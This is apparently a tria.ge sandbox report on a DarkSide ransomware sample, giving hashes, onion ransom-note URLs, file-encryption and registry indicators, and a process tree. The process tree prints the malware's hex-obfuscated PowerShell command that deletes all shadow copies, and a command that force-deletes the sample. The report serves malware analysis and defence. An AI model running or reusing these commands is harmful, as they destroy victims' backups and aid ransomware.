Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
144s -
max time network
147s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
02/06/2023, 07:32
Static task
static1
Behavioral task
behavioral1
Sample
Darkside.exe
Resource
win10-20230220-en
General
-
Target
Darkside.exe
-
Size
59KB
-
MD5
cfcfb68901ffe513e9f0d76b17d02f96
-
SHA1
766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f
-
SHA256
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61
-
SHA512
0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c
-
SSDEEP
768:9jjV7Iax7F3DS4/S96/P3rsAc4ci5pwwX5+R4VYY23W5:vx7Fu4/i6/P3rlckx5+R4VDZ5
Malware Config
Extracted
C:\Users\README.548ef3f2.TXT
darkside
http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF
http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Renames multiple (158) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\HideMove.png => C:\Users\Admin\Pictures\HideMove.png.548ef3f2 Darkside.exe File opened for modification C:\Users\Admin\Pictures\HideMove.png.548ef3f2 Darkside.exe File opened for modification C:\Users\Admin\Pictures\OptimizeComplete.tiff Darkside.exe File renamed C:\Users\Admin\Pictures\OptimizeComplete.tiff => C:\Users\Admin\Pictures\OptimizeComplete.tiff.548ef3f2 Darkside.exe File opened for modification C:\Users\Admin\Pictures\OptimizeComplete.tiff.548ef3f2 Darkside.exe File renamed C:\Users\Admin\Pictures\PingOpen.tif => C:\Users\Admin\Pictures\PingOpen.tif.548ef3f2 Darkside.exe File opened for modification C:\Users\Admin\Pictures\PingOpen.tif.548ef3f2 Darkside.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\548ef3f2.BMP" Darkside.exe Set value (str) \REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\548ef3f2.BMP" Darkside.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2076 Darkside.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Control Panel 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Control Panel\Desktop\WallpaperStyle = "10" Darkside.exe -
Modifies registry class 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.548ef3f2\ = "548ef3f2" Darkside.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\548ef3f2\DefaultIcon Darkside.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\548ef3f2 Darkside.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\548ef3f2\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\548ef3f2.ico" Darkside.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.548ef3f2 Darkside.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 3976 powershell.exe 3976 powershell.exe 3976 powershell.exe 2076 Darkside.exe 2076 Darkside.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2076 Darkside.exe Token: SeSecurityPrivilege 2076 Darkside.exe Token: SeTakeOwnershipPrivilege 2076 Darkside.exe Token: SeLoadDriverPrivilege 2076 Darkside.exe Token: SeSystemProfilePrivilege 2076 Darkside.exe Token: SeSystemtimePrivilege 2076 Darkside.exe Token: SeProfSingleProcessPrivilege 2076 Darkside.exe Token: SeIncBasePriorityPrivilege 2076 Darkside.exe Token: SeCreatePagefilePrivilege 2076 Darkside.exe Token: SeBackupPrivilege 2076 Darkside.exe Token: SeRestorePrivilege 2076 Darkside.exe Token: SeShutdownPrivilege 2076 Darkside.exe Token: SeDebugPrivilege 2076 Darkside.exe Token: SeSystemEnvironmentPrivilege 2076 Darkside.exe Token: SeRemoteShutdownPrivilege 2076 Darkside.exe Token: SeUndockPrivilege 2076 Darkside.exe Token: SeManageVolumePrivilege 2076 Darkside.exe Token: 33 2076 Darkside.exe Token: 34 2076 Darkside.exe Token: 35 2076 Darkside.exe Token: 36 2076 Darkside.exe Token: SeDebugPrivilege 3976 powershell.exe Token: SeBackupPrivilege 4048 vssvc.exe Token: SeRestorePrivilege 4048 vssvc.exe Token: SeAuditPrivilege 4048 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 2076 wrote to memory of 3976 2076 Darkside.exe 67 PID 2076 wrote to memory of 3976 2076 Darkside.exe 67 PID 2076 wrote to memory of 3368 2076 Darkside.exe 74 PID 2076 wrote to memory of 3368 2076 Darkside.exe 74 PID 2076 wrote to memory of 3368 2076 Darkside.exe 74 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Darkside.exe"C:\Users\Admin\AppData\Local\Temp\Darkside.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3976
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\Darkside.exe >> NUL2⤵PID:3368
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4048
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5ea6243fdb2bfcca2211884b0a21a0afc
SHA12eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA2565bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
Filesize
1KB
MD59f80c33d8a4a596d3847cd7684f6db01
SHA1ee980fed34b76e4b98dfa96573eb6be0c82643d7
SHA256d340cfe06b313fedf25b49907c39584210a155788a4807507cee231a87e0d3a5
SHA51217db5cfa56dbb76c036e49d3e6055a168f1dd08b155d93c514afb95ef16d8985bf921c037d5d1a45865b1df987e7746b5d2c98be54762d4219d60cf92acd44df
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
3KB
MD5b58e2411168bbdbec635cf4001635db0
SHA1c130cd9caaaa514a6b98c1168e10d44a989d191a
SHA256652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a
SHA51287e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a